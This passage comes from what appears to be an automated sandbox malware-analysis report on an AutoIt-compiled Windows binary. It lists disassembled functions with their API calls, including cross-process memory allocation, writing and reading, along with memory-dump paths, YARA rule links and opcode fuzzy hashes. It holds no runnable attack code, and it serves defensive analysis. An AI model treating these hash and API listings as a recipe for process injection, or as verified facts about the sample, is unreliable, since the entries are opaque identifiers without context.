                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                      • Opcode ID: 37d6ad3220cddb2d561c99c82110a7d1604a15aa99d6300938a112fa287cc34b
                                                                                                                      • Instruction ID: 888af95b9631dc3ec82ecac77ef37adb404272356153d990471b81085bb355ab
                                                                                                                      • Opcode Fuzzy Hash: 37d6ad3220cddb2d561c99c82110a7d1604a15aa99d6300938a112fa287cc34b
                                                                                                                      • Instruction Fuzzy Hash: 13516A71808744ABE321AF14D885BAFBBECFF99354F41485DF2C8410A2EB71856CC766
                                                                                                                      Function 003ECE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A417D: __fread_nolock.LIBCMT ref: 003A419B
                                                                                                                      • _wcscmp.LIBCMT ref: 003ECF49
                                                                                                                      • _wcscmp.LIBCMT ref: 003ECF5C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                      • String ID: FILE
                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                      • Opcode ID: 54088ad56bd56bcd512840ed9be3d288dcc5e60ee54a489cf5cce21ba7a267e4
                                                                                                                      • Instruction ID: 2c31195b285e40cf0ec3c4a19a7830bd63d3d0c5ecb7b2db5a42b8081cfa7805
                                                                                                                      • Opcode Fuzzy Hash: 54088ad56bd56bcd512840ed9be3d288dcc5e60ee54a489cf5cce21ba7a267e4
                                                                                                                      • Instruction Fuzzy Hash: 3141D432A10259BADF12DFA5CC81FEF7BBAEF8A710F000569F601EB191D7719A458B50
                                                                                                                      Function 003C9AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      • __getbuf.LIBCMT ref: 003C9B8A
                                                                                                                      • __lseeki64.LIBCMT ref: 003C9BFA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                      • String ID: pM=
                                                                                                                      • API String ID: 3311320906-3054488603
                                                                                                                      • Opcode ID: 3166ea9f7b33bc9e5ae425e9b7c9823ebebedbec6ad3a173221488c27627cb57
                                                                                                                      • Instruction ID: 8e692cc8b2dc766b566b9c2e422cdf8bdc193c5aea6c5b292c05c4bf8eda5305
                                                                                                                      • Opcode Fuzzy Hash: 3166ea9f7b33bc9e5ae425e9b7c9823ebebedbec6ad3a173221488c27627cb57
                                                                                                                      • Instruction Fuzzy Hash: 8E410271500B05AED3269F28D899F7A77E8AB45330F16C61FE4AACB6D1D774EC408B10
                                                                                                                      Function 0040A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0040A668
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0040A67D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 8c3872f42beea5c0d642d4d7f1f7050eef07770f1dba86c87bb7f649cf121048
                                                                                                                      • Instruction ID: 9115df9d301f873305a3a198efb426a73f99e0d55ee2fe09c57f368f96cf1e20
                                                                                                                      • Opcode Fuzzy Hash: 8c3872f42beea5c0d642d4d7f1f7050eef07770f1dba86c87bb7f649cf121048
                                                                                                                      • Instruction Fuzzy Hash: AE413875A00309AFDB14CF68C881BDA7BB9FB09300F14057AE905EB381D775A952CFA5
                                                                                                                      Function 00409567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 0040961B
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00409657
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                      • Opcode ID: 8cd9a05e62678115e91e91bd77670a805c7b23dd071195c4f3e828d26ed448f5
                                                                                                                      • Instruction ID: 78c1af30a6ccb43f85fffc9172015ec48698a6164cc3f4ef3fb2eb5e08c3de71
                                                                                                                      • Opcode Fuzzy Hash: 8cd9a05e62678115e91e91bd77670a805c7b23dd071195c4f3e828d26ed448f5
                                                                                                                      • Instruction Fuzzy Hash: 3E31C131500604AEEB209F24DC40FFB77A8FF48354F10852AF9A9D7291CA359C91DB68
                                                                                                                      Function 003DD0D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 003DD0ED
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003DD127
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: 1b3bb1edddcbc8550896faf2753fd1b198cc2386fb98cc8ed7e4e1eb4c857a74
                                                                                                                      • Instruction ID: 708ea909e574ab23da2ae64fb617ea1c5344ed8cb2f477cb112a7b1297709779
                                                                                                                      • Opcode Fuzzy Hash: 1b3bb1edddcbc8550896faf2753fd1b198cc2386fb98cc8ed7e4e1eb4c857a74
                                                                                                                      • Instruction Fuzzy Hash: 4F21B973D00215ABCB17AF54D881DEEB779EF89714B12802AE915AB390EA745C46C790
                                                                                                                      Function 003E5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003E5BE4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E5C1F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 87c38894b6f5cd23ef4e848ac48c0acc15af78ff5fa9a8ec91ba23cfa4a2d366
                                                                                                                      • Instruction ID: 827ec64d4d0af7c3f9a29bf328331d4621d175e6e6c29e0ec15f4e4e057c6824
                                                                                                                      • Opcode Fuzzy Hash: 87c38894b6f5cd23ef4e848ac48c0acc15af78ff5fa9a8ec91ba23cfa4a2d366
                                                                                                                      • Instruction Fuzzy Hash: 8D310B71500359EBDB26CF9AC885B9DBBF4EF05358F290119E981D61E0D7B09944CF10
                                                                                                                      Function 003F6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __snwprintf.LIBCMT ref: 003F6BDD
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __snwprintf_memmove
                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                      • API String ID: 3506404897-2584243854
                                                                                                                      • Opcode ID: 3592db65c0bec47ca8ec7ef9ea280173af49b69c4ddee99cca6e8cc1d09d9554
                                                                                                                      • Instruction ID: e24df77a3a845866ab0fd64ad90b7ba43b0c4b15fa68b40863bb49781dd81e31
                                                                                                                      • Opcode Fuzzy Hash: 3592db65c0bec47ca8ec7ef9ea280173af49b69c4ddee99cca6e8cc1d09d9554
                                                                                                                      • Instruction Fuzzy Hash: CC219E31600218AACF12EFA4CC82FAE77B5EF45700F104459F545AB182DB74EE45CBA5
                                                                                                                      Function 0040936B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E86AE: GetLocalTime.KERNEL32 ref: 003E86BB
                                                                                                                        • Part of subcall function 003E86AE: _wcsncpy.LIBCMT ref: 003E86F0
                                                                                                                        • Part of subcall function 003E86AE: _wcsncpy.LIBCMT ref: 003E8722
                                                                                                                        • Part of subcall function 003E86AE: _wcsncpy.LIBCMT ref: 003E8755
                                                                                                                        • Part of subcall function 003E86AE: _wcsncpy.LIBCMT ref: 003E8797
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00409405
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$LocalMessageSendTime
                                                                                                                      • String ID: @U=u$SysDateTimePick32
                                                                                                                      • API String ID: 2466184910-2530228043
                                                                                                                      • Opcode ID: 1629509ec9e74b15b93102a5ae600c2e3ff3708465979ec7733bffd560e3fa5c
                                                                                                                      • Instruction ID: e0b8ef472c720f51ec48ba6807849c73b313a6b6ca03cc54cadb9256df38e083
                                                                                                                      • Opcode Fuzzy Hash: 1629509ec9e74b15b93102a5ae600c2e3ff3708465979ec7733bffd560e3fa5c
                                                                                                                      • Instruction Fuzzy Hash: AC21E7317402146BEF218E54DC42FEF3369EB44754F10452AF950AB2D1D6B9AC519B68
                                                                                                                      Function 003DC98D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003DC9A6
                                                                                                                        • Part of subcall function 003E4C65: GetWindowThreadProcessId.USER32(?,?), ref: 003E4C90
                                                                                                                        • Part of subcall function 003E4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003DC9C2,00000034,?,?,00001004,00000000,00000000), ref: 003E4CA0
                                                                                                                        • Part of subcall function 003E4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003DC9C2,00000034,?,?,00001004,00000000,00000000), ref: 003E4CB6
                                                                                                                        • Part of subcall function 003E4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DC9FE,?,?,00000034,00000800,?,00000034), ref: 003E4D6B
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 003DCA0D
                                                                                                                        • Part of subcall function 003E4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 003E4D36
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1045663743-2594219639
                                                                                                                      • Opcode ID: 70976b8d232f9cd6e3d25275d5e144469f092f16dce2a81e99fa9b5b92845b5e
                                                                                                                      • Instruction ID: f497f4d99728d9e1f165db7bfeeb9780274069abf303abe258e50f5955c869f9
                                                                                                                      • Opcode Fuzzy Hash: 70976b8d232f9cd6e3d25275d5e144469f092f16dce2a81e99fa9b5b92845b5e
                                                                                                                      • Instruction Fuzzy Hash: 2E21A132911129ABDF22DBA4DC45FCEBBB8FF09350F1042A5E545AB1D1EA705E44CB90
                                                                                                                      Function 004091DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00409269
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00409274
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: cf6ad8eba5cdf0d5ba0c77ff62ac4f2305c355b2774d641adddd7ff2219a4a33
                                                                                                                      • Instruction ID: 0775cca32abbd746e58d49d761197b7ccafb4ec0867289168c267f22f406f491
                                                                                                                      • Opcode Fuzzy Hash: cf6ad8eba5cdf0d5ba0c77ff62ac4f2305c355b2774d641adddd7ff2219a4a33
                                                                                                                      • Instruction Fuzzy Hash: C811B671300109BFEF21DE54DC81FAB375AEB883A4F10453AF918AB2D1D679DC5197A4
                                                                                                                      Function 0040C1EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 0-2594219639
                                                                                                                      • Opcode ID: cf39735b71dbd6fbcd7335af3a1ca441646bb2ff5353d7da6f013fe07099ad16
                                                                                                                      • Instruction ID: cfb4c9bffd7a3647c45344b5d9dbb320a05073fa3c1841439e1acf69afa566f8
                                                                                                                      • Opcode Fuzzy Hash: cf39735b71dbd6fbcd7335af3a1ca441646bb2ff5353d7da6f013fe07099ad16
                                                                                                                      • Instruction Fuzzy Hash: 6011D331910208FFEF148F94CC81FBA3765EB05750F1442BAFA16BA5D0D2B8D911EB69
                                                                                                                      Function 0040970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003BC657
                                                                                                                        • Part of subcall function 003BC619: GetStockObject.GDI32(00000011), ref: 003BC66B
                                                                                                                        • Part of subcall function 003BC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 003BC675
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00409775
                                                                                                                      • GetSysColor.USER32(00000012), ref: 0040978F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                      • Opcode ID: 61ac38cefff49dd69e6836eaa0c364d02a2ad39ad7342dddc18a753f8bb25517
                                                                                                                      • Instruction ID: 33d0734f082a99f776ae8e81675b4f7e4f4fa494b32b63d2927423bdb1c7b6df
                                                                                                                      • Opcode Fuzzy Hash: 61ac38cefff49dd69e6836eaa0c364d02a2ad39ad7342dddc18a753f8bb25517
                                                                                                                      • Instruction Fuzzy Hash: A7116A72620209EFDB14DFB8CC45EEA7BB8EB08304F004529F955E3291E778E851DB54
                                                                                                                      Function 0040AFEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,?,?,?), ref: 0040B03B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
